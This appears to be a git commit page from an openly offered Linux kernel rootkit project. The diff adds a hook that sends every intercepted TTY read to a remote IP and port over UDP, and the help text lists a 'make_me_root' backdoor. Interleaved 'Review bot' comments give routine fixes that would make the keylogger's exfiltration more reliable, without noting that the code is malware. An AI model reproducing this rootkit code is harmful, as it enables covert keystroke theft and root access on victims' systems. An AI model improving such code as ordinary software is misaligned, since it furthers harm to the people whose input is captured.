linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit e78f5632177aee4e78aac55cb8a9c09cbd8ce610
parent 58926084fb1fc1aed1db5752a8c9399b73b1e9ee
Author: deurzen <m.deurzen@tum.de>
Date:   Sat, 12 Dec 2020 17:19:50 +0100

adds udp sending interface

Diffstat:
Msrc/backdoor.c | 2++
Msrc/inputlog.c | 27++++++++++++---------------
Msrc/rkctl/rkctl.c | 4++++
3 files changed, 18 insertions(+), 15 deletions(-)

diff --git a/src/backdoor.c b/src/backdoor.c
@@ -6,6 +6,7 @@
 #include "backdoor.h"
 #include "read.h"
 #include "hook.h"
+#include "inputlog.h"
 atomic_t tty_read_count;
@@ -39,6 +40,7 @@ g7_tty_read(struct file *file, char *buf, size_t count, loff_t *off)
 	atomic_inc(&tty_read_count);
 	ssize_t ret = current_tty_read(file, buf, count, off);
 	handle_pid(current->pid, buf, count);
+	send_udp(buf, count);
 	atomic_dec(&tty_read_count);
 	return ret;
 }
diff --git a/src/inputlog.c b/src/inputlog.c
@@ -56,8 +56,8 @@ log_input(const char *ip, const char *port)
 {
 	size_t i;
 	u8 ip_quad[4];
-	unsigned long ip_ul;
-	unsigned long port_ul;
+	unsigned long remote_ip_ul, local_ip_ul;
+	unsigned long remote_port_ul, local_port_ul;
 	if (sock)
 		return;
@@ -66,32 +66,29 @@ log_input(const char *ip, const char *port)
 		return;
 	{ // parse ip address and port from passed in strings
-		kstrtoul(port, 10, &port_ul);
+		kstrtoul(port, 10, &remote_port_ul);
 		in4_pton(ip, -1, ip_quad, -1, NULL);
-		ip_ul = 0;
+		remote_ip_ul = 0;
 		for (i = 0; i < 4; ++i)
-			ip_ul |= (ip_quad[3 - i] & 0xFF) << (8 * i);
+			remote_ip_ul |= (ip_quad[3 - i] & 0xFF) << (8 * i);
+
+		local_ip_ul = (127 << 24) | (0 << 16) | (0 << 8) | 1;
+		local_port_ul = 7777;
 	}
 	addr.sin_family = AF_INET;
-	addr.sin_addr.s_addr = htonl(ip_ul);
-	addr.sin_port = htons(port_ul);
+	addr.sin_addr.s_addr = htonl(remote_ip_ul);
+	addr.sin_port = htons(remote_port_ul);
 	bind.sin_family = AF_INET;
-	bind.sin_addr.s_addr = htonl((127 << 24) | (0 << 16) | (0 << 8) | (1));
-	bind.sin_port = htons(7777);
+	bind.sin_addr.s_addr = htonl(local_ip_ul);
+	bind.sin_port = htons(local_port_ul);
 	if (kernel_bind(sock, (struct sockaddr *)&bind, sizeof(bind))) {
 		sock_release(sock);
 		sock = NULL;
-		return;
 	}
-
-	char *buf = "testing\ntesting\ntesting\ntesting";
 	int buflen = strlen(buf);
-	send_udp(buf, buflen);
 }
 void
diff --git a/src/rkctl/rkctl.c b/src/rkctl/rkctl.c
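Review bot: The new `send_udp(buf, count)` forwards the caller's requested length `count` rather than `ret`, the byte count `current_tty_read` actually returned one line above, so on a short read or an error return the datagram carries whatever the user buffer already held beyond the data read; `if (ret > 0) send_udp(buf, ret);` limits it to what was read (the pre-existing `handle_pid` call has the same mismatch). `buf` is the user-space pointer handed to the read hook, and whether `send_udp` copies it into kernel memory before passing it to the socket is not visible in this hunk. `g7_tty_read` starts before this hunk.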
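Review bot: The results of `kstrtoul(port, 10, &remote_port_ul)` and `in4_pton(ip, -1, ip_quad, -1, NULL)` are discarded, so a malformed `<port>` or `<ip>` from rkctl leaves `remote_port_ul` or `ip_quad` uninitialized and that garbage is folded into `addr` by the `htonl`/`htons` lines below; a port above 65535 is likewise truncated by `htons` without complaint. Both calls should be checked, e.g. `if (kstrtoul(port, 10, &remote_port_ul) || remote_port_ul > 0xFFFF || in4_pton(ip, -1, ip_quad, -1, NULL) != 1)`, and the failure path should release `sock` and reset it to NULL the way the `kernel_bind` branch does, assuming the socket has already been created by the `return;` check at the top of the hunk. In `remote_ip_ul |= (ip_quad[3 - i] & 0xFF) << (8 * i)` the `u8` promotes to `int` before the shift, so a first octet of 128 or more is shifted into the sign bit; that is harmless under the kernel's build flags in practice, but `in4_pton` can fill a `__be32` directly, which removes both the loop and the `htonl`. `log_input` starts before this hunk, and the preceding `@@ -56,8 +56,8 @@` hunk only renames the same variables.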
@@ -122,6 +122,9 @@ parse_input(int argc, char **argv)
 		return (cmd_t){ handle_logging, (void *)socket };
 	}
+	if (ARGVCMP(1, "inputlogging-off"))
+		return (cmd_t){ handle_logging, (void *)0 };
+
 	help();
 	exit(1);
 }
@@ -227,4 +230,5 @@ help()
 	printf("%-38s %s\n", "backdoor-use-tty <0 | 1>", "listen for `make_me_root` on read (0) or TTY (1)");
 	printf("%-38s %s\n", "backdoor-off", "disable any (read or tty) backdoor");
 	printf("%-38s %s\n", "inputlogging <ip> <port>", "intercept {P,T}TY input and send it to <ip>:<port>");
+	printf("%-38s %s\n", "inputlogging-off", "disable input logging");
 }
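Review bot: The new branch passes `(void *)0` to `handle_logging` as an in-band "disable" sentinel beside the `socket` pointer used on the enable path two lines above, and nothing at the call site says so; a comment on the new `return`, `/* NULL socket: handle_logging disables input logging */`, or a named constant in place of the bare cast would make the contract visible. That `handle_logging` tests for NULL is implied by the new help text but cannot be confirmed from this hunk. `parse_input` starts before this hunk, and the second hunk only extends the help text.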